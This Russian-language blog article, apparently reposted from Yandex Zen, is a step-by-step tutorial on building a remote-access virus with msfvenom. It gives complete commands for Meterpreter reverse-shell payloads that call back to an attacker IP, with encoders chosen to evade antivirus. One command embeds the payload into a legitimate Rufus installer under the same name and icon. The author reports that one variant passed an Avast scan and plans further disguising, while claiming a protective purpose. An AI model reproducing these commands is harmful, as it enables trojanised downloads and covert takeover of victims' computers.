Вирус удаленного доступа, который не палится антивирусом

Приветствую всех читателей. Сегодня мы опять затронем тему создания вирусов. Хочется сразу сказать, что эта статья является основой для моей дальнейшей работы. Пусть вас не смущает то, что мы никак не скрываем вирус, этим мы займемся в дальнейшем. Здесь я просто показываю, как создать зловред, чтобы потом данную информацию не приходилось дублировать в будущем.
Сегодня же наша цель создать вирус удаленного доступа, который впоследствии мы будем скрывать под различными обертками

Тем у кого Kali Linux уже установлен достаточно просто открыть терминал. Пользоваться мы будем Msfvenom. Я покажу несколько вариантов создания полезной нагрузки. Объясню по частям, что означает каждая из частей команды (на последнем варианте), а также приведу команды, которые понадобятся для того, чтобы управлять компьютером жертвы.

1 Вариант

Начнем с самого простого, а именно вот с такой команды:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.200.132 LPORT=4444 -a x64 -f exe -o forskeika1.exe

Ничего замудренного. В LHOST вы должны указать свой IP адрес, узнать его можно при помощи команды ifconfig (у меня это 192.168.200.132). Так как мы атакуем только свои компьютеры и только в локальной сети, я прописываю свой локальный IP. Созданный файл сохранится в той директории, в которой вы сейчас находитесь.

2 Вариант

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.200.132 -e x86/shikata_ga_nai -i 5 -b "\x00" -f exe -o virus.exe

Команда немного усовершенствована. Добавлено шифрование (-e x86/shikata_ga_nai) в несколько итераций, в данном случае их 5 ( -i 5).

Пример для другого типа шифрования:

msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.132 -e cmd/powershell_base64 -i 10 -b "\x00" -f exe -o virus1.exe

Вы можете выбрать свой тип шифрования. Для просмотра доступных кодировщиков пропишите

msfvenom -l encoders

3 Вариант

Тут я задействую сторонний exe файл какой-либо программы, который нужно предварительно скачать и перед вводом команды перейти в папку, содержащий данный exe файл.

msfvenom --platform windows --arch x64 -x rufus-3.8.exe -k -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.132 -e cmd/powershell_base64 -i 10 -b "\x00" -f exe -o rufus-3.8.exe

Поясняю, что тут есть что.

  • --platform windows - платформа Windows
  • -x rufus-3.8.exe - файл, который мы заражаем
  • -k - нужен для встраивания нагрузки
  • -p windows/meterpreter/reverse_tcp - тип полезной нагрузки
  • lhost=192.168.200.132 - ip компьютера атакующего (ваш IP)
  • -e cmd/powershell_base64 - шифрование (оно и помогло не спалиться)
  • -i 10 - количество итераций шифрования
  • -f exe - формат файла
  • -o rufus-3.8.exe - файл, который вы получите на выходе

На выходе вы получаете файл с такой же иконкой и названием как у оригинала, но только с вирусом удаленного доступа внутри.

Тестировать всё это буду на самой новой Win10 со всеми обновлениями. Вирус без шифрования и с шифрованием x86/shikata_ga_nai без проблем поймались антивирусом. А вот вирус с шифрованием cmd/powershell_base64 остался незамеченным. Avast "говорит", что с данным файлом всё в порядке. Вот это действительно сюрприз.

Я сделал запись с экрана, как я провожу сканирование, чтобы мне потом не писали в комментариях, что автор обманывает. Вот ссылка на эту запись. Хотя по-любому останутся те, кто не верит.

Интересно как долго он не будет палиться антивирусом. Хотя мне кажется, что антивирус всё-таки мог что-то заподозрить и отправить данный файл в лабораторию. Если он не будет палиться еще в течение нескольких суток, я сам отправлю его в лабораторию с указанием, что это вирус. Я же всё-таки не занимаюсь взломом, а наоборот, хочу защитить пользователей.

Источник - https://zen.yandex.ru/media/planetashelezyaka/virus-udalennogo-dostupa-kotoryi-ne-palitsia-antivirusom-5e15c52be3062c00b102aa8e